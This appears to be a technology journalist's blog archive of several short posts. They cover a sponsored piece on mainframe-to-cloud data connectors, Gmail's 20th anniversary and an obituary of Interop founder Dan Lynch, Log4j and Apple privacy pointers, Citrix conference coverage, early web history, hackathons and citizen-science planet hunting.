The Cloud-Ready Mainframe: Extending Your Data’s Reach and Impact

(This post is sponsored by VirtualZ Computing)

Some of the largest enterprises are finding new uses for their mainframes. And instead of competing with cloud and distributed computing, the mainframe has become a complementary asset that adds new productivity and a level of cost-effective scale to existing data and applications. 

While the cloud does quite well at elastically scaling up resources as application and data demands increase, the mainframe is purpose-built for the largest-scale digital applications. But more importantly, it has kept pace as these demands have mushroomed over its 60-year reign, and why so many large enterprises continue to use them. Having them as part of a distributed enterprise application portfolio could be a significant and savvy use case, and be a reason for increasing their future role and importance.

Estimates suggest that there are about 10,000 mainframes in use today, which may not seem a lot except that they can be found across the board in more than two-thirds of Fortune 500 companies, In the past, they used proprietary protocols such as Systems Network Architecture, had applications written in now-obsolete coding languages such as COBOL, and ran on custom CPU hardware. Those days are behind us: instead, the latest mainframes run Linux and TCP/IP across hundreds of multi-core  microprocessors. 

But even speaking cloud-friendly Linux and TCP/IP doesn’t remove two main problems for mainframe-based data. First off, many mainframe COBOL apps are their own island, isolated from the end-user Java experience and coding pipelines and programming tools. To break this isolation usually means an expensive effort to convert and audit the code. 

A second issue has to do with data lakes and data warehouses. These applications have become popular ways that businesses can spot trends quickly and adjust IT solutions as their customer’s data needs evolve. But the underlying applications typically require having near real-time access to existing mainframe data, such as financial transactions, sales and inventory levels or airline reservations. At the core of any lake or warehouse is conducting a series of “extract, transform and load” operations that move data back and forth between the mainframe and the cloud. These efforts only transform data at a particular moment in time, and also require custom programming efforts to accomplish.

What was needed was an additional step to make mainframes easier for IT managers to integrate with other cloud and distributed computing resources, and that means a new set of software tools. The first step was thanks to initiatives such as the use of IBM’s z/OS Connect. This enabled distributed applications to access mainframe data. But it continued the mindset of a custom programming effort and didn’t really provide direct access to distributed applications.

To fully realize the vision of mainframe data as equal cloud nodes required a major makeover, thanks to companies such as VirtualZ Computing. They latched on to the OpenAPI effort, which was previously part of the cloud and distributed world. Using this protocol, they created connectors that made it easier for vendors to access real-time data and integrate with a variety of distributed data products, such as MuleSoft, Tableau, TIBCO, Dell Boomi, Microsoft Power BI, Snowflake and Salesforce. Instead of complex, single-use data transformations, VirtualZ enables real-time read and write access to business applications. This means the mainframe can now become a full-fledged and efficient cloud computer. 

VirtualZ CEO Jeanne Glass says, “Because data stays securely and safely on the mainframe, it is a single source of truth for the customer and still leverages existing mainframe security protocols.” There isn’t any need to convert COBOL code, and no need to do any cumbersome data transformations and extractions.

The net effect is an overall cost reduction since an enterprise isn’t paying for expensive high-resource cloud instances. It makes the business operation more agile, since data is still located in one place and is available at the moment it is needed for a particular application. These uses extend the effective life of a mainframe without having to go through any costly data or process conversions, and do so while reducing risk and complexity. These uses also help solve complex data access and report migration challenges efficiently and at scale, which is key for organizations transitioning to hybrid cloud architectures. And the ultimate result is that one of these hybrid architectures includes the mainframe itself.

Gmail at 20, RIP Dan Lynch

Writing a computer-themed column appearing today can be a tough assignment. But I want to assure you that first, it isn’t any net-fueled prank and second, that it is actually written from start to end by me and not by some algorithm. More on that in a moment.

Today marks the 20th anniversary of Gmail’s creation. Google was playing with fire when it first announced the service in this press release, and the initial reaction was disbelief because of the date. Back then, it was an amazing feat to offer a gigabyte of storage — since expanded to 15 GB for the free tier. This was when many email services had capacity limits of 4MB or so, which seem laughable by today’s standards.

and the ability to search your entire email corpus. Now there are more than 1.5B users around, including myself. (I actually host my domain with Google, which was free until recently.) Here is a screen grab of what it looked like back then.

But there is another and sadder moment that I want to mention.

Over the weekend we lost one of the Great Ones, Dan Lynch, who was the founder of the Interop trade show. He was one of the prime movers behind the commercialization of the internet, back when we all used the capital “I” as befitting its status in society.

I was involved in the show in numerous ways: as a tech journalist (and editor-in-chief of what would become the leading computer networking business publication), as an editorial consultant to help guide the conference program, and as a speaker and lecturer. At its height, Dan put on five shows yearly around the world, and I spoke at many of them. Here is an interesting historical plot of when and where the shows took place.

You can read more about Dan’s accomplishments with this NYT obit written by Katie Hafner. He was 82, from kidney failure.

One of the features of Interop was its ability to force vendors into improving their products in real time, during the several days that the show was running, with what eventually was called the Shownet. In the early days, TCP/IP was still very much an experimental set of protocols and had yet to become the global lingua franca that it is today. The Shownet was born out of the necessity to get better interoperability, hence the show’s name. It began with 300 vendors and eventually blossomed to attract tens of thousands of attendees. This year the show is back from being virtual and being held in Tokyo this summer.

“The Shownet was also often the first place where many router or switch devices ever met a complex topology,” wrote Karl Auerbach, one of the many volunteer engineers who worked on it over the years, “Few saw the almost continuous efforts, done under Dan’s watch, between shows to design, pre-build (in ever larger warehouses), ship, deploy, operate, and then remove. The Shownet trained hundreds of electricians in the arts of network wiring over the years.”

I wanted to talk to Dan as part of an article that I am writing for the Internet Protocol Journal about the history and tenacity of the Shownet, but sadly we weren’t able to connect before his passing. He was truly a force of nature, a force that brought a lot of goodness to the world, and changed it for the better. Many of us owe our career developments, knowledge about computing, and human connections to Dan’s efforts.

So one final note. I came across this coda that explains “human-generated content” on a website by displaying one of three icons. I want to assure you that my website, newsletter, and any work that I produce is 100% written by me, that the people I quote are also actual carbon-based life forms, and no GPUs have been harmed or otherwise employed to produce this work product.

SiliconANGLE: The changing economics of open-source software

The world of open-source software is about to go through another tectonic change. But unlike earlier changes brought about by corporate acquisitions, this time it’s thanks to the growing series of tech layoffs. The layoffs will certainly change the balance of power between large and small software vendors, and between free and commercial software versions, and the role played by OSS in enterprise software applications could change.

In this post for SilicionANGLE, I talk about why these changes are important and what enterprise software managers should take away from the situation.

 

Infoworld: What app developers need to do now to fight Log4j exploits

Earlier this month, security researchers uncovered a series of major vulnerabilities in the Log4j Java software that is used in tens of thousands of web applications. The code is widely used across consumer and enterprise systems, in everything from Minecraft, Steam, and iCloud to Fortinet and Red Hat systems. One analyst estimate millions of endpoints could be at risk.

There are at least four major vulnerabilities from Log4j exploits. What is clear is that as an application developer, you have a lot of work to do to find, fix, and prevent log4j issues in the near-term, and a few things to worry about in the longer term.

You can read my analysis and suggested strategies in Infoworld here.

Avast blog: How will advertisers respond to Apple’s latest privacy changes?

Last week, we described the privacy changes happening within Apple’s iOS 14.5. Now, in this post, we’ll be presenting the advertiser’s perspective of the situation at hand. While advertisers may think the sky is falling, the full-on Chicken Little scenario might not be happening. The changes will make it harder – but not impossible – for advertisers to track users’ habits and target ads to their devices. And as I mention in my latest blog for Avast here, digital ad vendors need to learn new ways to target their campaigns. They have done it before, and hopefully the changes in iOS will be good for everyone, eventually.

 

Picking the right tech isn’t always about the specs

I have been working in tech for close to 40 years, yet it took me until this week to realize an important truth: we have too many choices and too much tech in our lives, both personal and work. So much of the challenges about tech is picking the right product, and then realizing afterwards the key limitations about our choice and its consequences. I guess I shouldn’t complain, after all, I have had a great career out of figuring this stuff out.

But it really is a duh! moment. I don’t know why it has taken me so long to come to this brilliant deduction. I am not complaining, it is nice to help others figure out how to make these choices. Almost every day I am either writing, researching or discussing tech choices for others. But like the barefoot shoemaker’s children, my own tech choices are often fraught with plenty of indecisions, or worse yet, no decision. It is almost laughable.

I was involved in a phone call yesterday with a friend of mine who is as technical as they come: he helped create some of the Net’s early protocols. We both were commiserating about how quirky Webex is when trying to support a multiple-hundred conference call. Yes, Webex is fine for doing the actual video conference itself. The video and audio quality are both generally solid. But it is all the “soft” support that rests on the foibles of how we humans are applying the tech: doing the run-up practice session for the conference, notifying everyone about the call, distributing the slide deck under discussion and so forth. These things require real work to explain what to do to the call’s organizers and how to create standards to make the call go smoothly. It isn’t the tech per se – it is how we apply it.

Let me draw a line from that discussion to an early moment when I worked in the bowels of the end-user IT support department of the Gigantic Insurance company in the early 1980s. We were buying PCs by the truckload, quite literally, to place on the desks of the several thousand IT staffers that until then had a telephone and if they were lucky a mainframe terminal. Of course, we were buying IBM PCs – there was no actual discussion because back then that was the only choice for corporate America. Then Compaq came along and built something that IBM didn’t yet have: a “portable” PC. The reason for the quotes was that this thing was enormous. It weighed about 30 pounds and was an inch too big to put in the overhead bins of most planes.

As soon as Compaq announced this unit (which sold for more than $5000 back then), our executives were conflicted. Our IBM sales reps, who had invested many man-years in golf games with them, were trying to convince them to wait for a year before their own portable PC could come to market. But once we got our hands on an IBM prototype, we could see that Compaq was a superior machine: First, it was already available. It also was lighter and smaller and ran the same apps and had a compatible version of DOS. We gave Compaq our recommendation and started buying them in droves. That was the beginning of what was called the clone wars, unleashing a new era of technology choices to the corporate world. After IBM finally came out with their portable, Compaq already had put hard drives in their model so they stayed ahead of IBM on features.

My point in recounting this quaint history lesson is to point out something that hasn’t changed in nearly 40 years: how tech reviews tend to focus on the wrong things, which is why we get frustrated when we finally decide on a piece of tech and then live with the consequences.

Some of our choices seem easy: who wants to pay a thousand bucks for a stand to sit your monitor on? Of course, some things haven’t changed: the new Macs also sell for more than $5000. That is progress, I guess.

My moral for today: looking beyond the specs and understand how you are eventually going to use the intended tech. You may choose differently.

Blogger in residence at Citrix Synergy conference

This is my second time at the major Citrix annual conference, and I will be posting regularly during and after the show. My first piece can be found here and covers what I heard from a new management team at Citrix. They introduced their vision for the future of Citrix, and the future of work. “Work is no longer a place you go, it is an activity and digital natives expect their workplace to be virtual and follow them wherever they go. They are pushing the boundaries of how they work,” said Citrix CEO Kirill Tatarinov.

My second post is on Windows Continuum. This puts the Windows 10 functionality on a lot of different and non-traditional IT devices, such as the Surface Hub gigantic TV, Xbox consoles, and Windows Phones. If you review the information provided from Microsoft, you might get the wrong idea of how useful this could be for the enterprise, and in my post I discuss what Citrix is doing to embrace and extend this interface.

My next piece is looking at several infosec products that were shown at the show, including solutions from Bitdefender, Kaspersky, IGEL and Veridium. Security has been a big focus at the show and I am glad to see these vendors here supporting Citrix products.

Speaking of security, one of the more important product announcements this week at Synergy was that the Secure Browser Essentials will be available later this year on the Azure Marketplace. This is actually the second secure browsing product that Citrix has announced, and you can read my analysis of how they differ and what are some things to consider if you are looking for such a product.

And here is a story about the Okada Manila Resort that was featured as a semi-finalist for the innovation award at the show. It was built on a huge site and is similar to the resort-style properties that can be found in Las Vegas and Macau. It will house 2,300 guest rooms when it is fully built and have 10,000 employees. Scott’s IT department has at least 100 of them full-time — plus contractors — to support 2,000 endpoints and numerous physical and virtual servers placed in two separate datacenters on the property. I spoke to the IT manager about how he built his infrastructure and some of the hard decisions he had to make. 

At his Synergy keynote, Citrix CEO Kirill Tatarinov mentioned that IT “needs a software defined perimeter (SDP) that helps us manage our mission critical assets and enable people to work the way they want to.” The concept is not a new one, having been around for several years. An SDP replaces the traditional network perimeter — usually thought of as a firewall. I talk about what an SDP is and what Citrix is doing here. 

Finally, this piece is about the Red Bull Racing team and how they are using various Citrix tech to power their infrastructure. Few businesses create a completely different product every couple of weeks, not to mention take their product team on the road and set up a completely new IT system on the fly. Yet, this is what the team at Red Bull Racing do each and every day.

Looking back at 25 years of the world wide web

This week the web has celebrated yet another of its 25th birthdays, and boy does that make me feel old. Like many other great inventions, there are several key dates along the way in its origin story. For example, here is a copy of the original email that Tim Berners-Lee sent back in August 1991, along with an explanation of the context of that message. Steven Vaughan-Nichols has a nice walk down memory lane over at ZDnet here.

Back in 1995, I had some interesting thoughts about those early days of the web as well. This column draws on one that I wrote then, with some current day updates.

I’ve often said that web technology is a lot like radio in the 1920s: station owners are not too sure who is really listening but they are signing up advertisers like crazy, programmers are still feeling around for the best broadcast mechanisms, and standards that are changing fast making for lots of unsure technology that barely works on the best of days. Movies obviously are the metaphor for Java and audio applets and other non-textual additions.

So far, I think the best metaphor for the web is that of a book: something that you’d like to have as a reference source, entertaining when you need it, portable (well, if you tote around a laptop), and so full of information that you would rather leave it on your shelf.

Back in 1995, I was reminded of so-called “electronic books” that were a big deal. One of my favorites then was a 1993 book/disk package called The Electronic Word by Richard Lanham. It is ironically about how computers have changed the face of written communications. The book is my favorite counter-example of on-line books. Lanham is an English professor at UCLA and the book comes with a Hypercard stack that shows both the power of print and how unsatisfactory reading on the screen can be. Prof. Lanham takes you through some of the editing process in the Hypercard version, showing before and after passages that were included in the print version.

But we all don’t want to read stuff on-line, especially dry academic works that contain transcripts of speeches. That is an important design point for webmasters to consider. Many websites are full reference works, and even if we had faster connections to the Internet, we still wouldn’t want to view all that stuff on-screen. Send me a book, or some paper, instead.

aaaSpeaking of eliminating paper, in my column I took a look at what Byte magazine is trying to do with their Virtual Press Room. (The link will take you to a 1996 archive copy, where you can see the beginnings of what others would do later on. As with so many other things, Byte was so far ahead of the curve.)

Byte back then had an intriguing idea of having vendors send their press releases electronically, so editors don’t have to plow through the printed ones. But how about a step further in the interest of saving trees: sending in both the links to the vendor’s own websites and whatever keywords are needed. Years later, I am still asking vendors for key information from their press releases. Some things don’t change, no matter what the technology.

What separates good books from bad is good indexing and great tables of contents. We use both in books to find our way around: the latter more for reference, the former more for determining interest and where to enter its pages. So how many websites have you visited lately that have either, and have done a reasonable job on both? Not many back in 1995, and not many today, sadly. Some things don’t change.

Today we almost take it for granted that numerous enterprise software products have web front-end interfaces, not to mention all the SaaS products that speak native HTML. But back in the mid 1990s, vendors were still struggling with the web interface and trying it on. Cisco had its UniverCD (shown here), which was part CD-ROM and part website. The CD came with a copy of the Mosaic browser so you could look up the latest router firmware and download it online, and when I saw this back in the day I said it was a brilliant use of the two interfaces. Novell (ah, remember them?) had its Market Messenger CD ROM, which also combined the two. There were lots of other book/CD combo packages back then, including Frontier’s Cybersearch product. It had the entire Lycos (a precursor of Google) catalog on CD along with browser and on-ramp tools. Imagine putting the entire index of the Internet on a single CD. Of course, it would be instantly out of date but you can’t fault them for trying.

The reason why vendors combined CDs with the web was because bandwidth was precious and sending images down a dial-up line was painful. (Remember that the first web browser shown at the top of this column was text-only.) If you could off load these images on to a CD, you could have the best of both worlds. At the time, I said that if we wanted to watch movies, we would go to Blockbuster and rent one. Remember Blockbuster? Now we get annoyed if our favorite flick isn’t available to be immediately streamed online.

Yes, the web has come a long ways since its invention, no matter which date you choose to celebrate it. It has been an amazing time to be around and watch its progress, and I count myself lucky that I can use its technology to preserve many of the things that others and I have written about it.

Fast Track blog: The benefits of being in a hackathon

With the number of coding for cash contests, popularly called hackathons, exploding, now might be the time that you should consider spending part of your weekend or an evening participating, even if you aren’t a total coder. Indeed, if you are one of the growing number of citizen developers, you might be more valuable to your team than someone who can spew out tons of Ruby or Perl scripts on demand. I spoke to several hackathon participants at the QuickBase EMPOWER user conference last month to get their perspective. You can read my post in QuickBase’s Fast Track blog today.

Using citizen science to hunt for new planets

When I was growing up, one of my childhood heroes was Clyde Tombaugh, the astronomer who discovered Pluto. Since then, we have demoted Pluto from its planetary status. But it still was a pretty cool thing to be someone who discovered a planet-like object. Today, you have this opportunity to find a new planet, and you don’t even need a telescope nor spend lonely cold nights at some mountaintop observatory. It is all thanks to an aging NASA spacecraft and how the Internet has transformed the role of public and private science research.

Let’s start in the beginning, seven years ago when the Kepler spacecraft was launched. Back then, it was designed to take pictures of a very small patch of space that had the most likely conditions to find planets orbiting far-away stars. (See above.) By closely scrutinizing this star field, the project managers hoped to find variations in the light emitted by stars that had planets passing in front of them. It is a time-tested method that Galileo used to discover Jupiter’s moons back in 1610. When you think about the great distances involved, it is pretty amazing that we have the technology to do this.

Since its launch, key parts of the spacecraft have failed but researchers have figured out how to keep it running using the Sun’s solar winds to keep the cameras properly aligned. As a result, Kepler has been collecting massive amounts of data and downloading the images faithfully over the years, and more than 1,000 Earth-class (or M class, from Star Trek) planets have already been identified. There are probably billions more out there. 

NASA has extended Kepler’s mission as long as it can, and part of that extension was to establish an archive of the Kepler data that anyone can examine. This effort, called Planethunters.org, is where the search for planets gets interesting. NASA and various other researchers, notably from Chicago’s Adler Planetarium and Yale University, have enlisted hundreds of thousands of volunteers from around the world to look for more planets. You don’t need a physics degree, you don’t need any sophisticated computer or run any Big Data algorithms. Instead, if you have a keen mind and eyesight to pore over the data and the motivation to try to spot a sequence that would indicate a potential planetary object.

What is fascinating to me is how this crowd-based effort has been complementary to what has already happened with the Kepler database. NASA admits that it needs help from humans. As they state online, “We think there will be planets which can only be found via the innate human ability for pattern recognition. At Planet Hunters we are enlisting the public’s help to inspect the Kepler [data] and find these planets missed by automated detection algorithms.”   

Think about that for a moment. We can harness the seemingly infinite computing power available in the cloud, but it isn’t enough. We still need carbon-based eyeballs to figure this stuff out.

Planet Hunters is just one of several projects that are hosted on Zooniverse.org, a site devoted to dozens of crowdsourced “citizen science” efforts that span the gamut of research. Think of what Amazon’s Mechanical Turk does by parcelling out pieces of data that humans classify and interpret. But instead of helping some corporation you are working together on a research project. And it isn’t just science research: there is a project to help transcribe notes from Shakespeare’s contemporaries, another one to explore WWI diaries from soldiers, and one to identify animals captured by webcams in Gorongosa National Park in Mozambique. Many of the most interesting discoveries from these projects have come from discussions between volunteers and researchers. That is another notable aspect: in the past, you needed at least a PhD or some kind of academic street cred to get involved with this level of research. Now anyone with a web browser can join in. Thousands have signed up.

Finally, the Zooniverse efforts are paying another unexpected benefit: participants are actually doing more than looking for the proverbial needle in the haystack. They are learning about science by doing the actual science research. It is taking something dry and academic and making it live and exciting. And the appeal isn’t just adults, but kids too: one blog post on the site showed how Czech nine year old kids got involved in one project. That to me is probably the best reason to praise the Zooniverse efforts.

So far, the Planet Hunters are actually finding planets: more than a dozen scientific papers have already been published, thanks to these volunteers around the world on the lookout. I wish I could have had this kind of access back when I was a kid, but I also have no doubt that Tombaugh would be among these searchers, had he lived to see this all happening.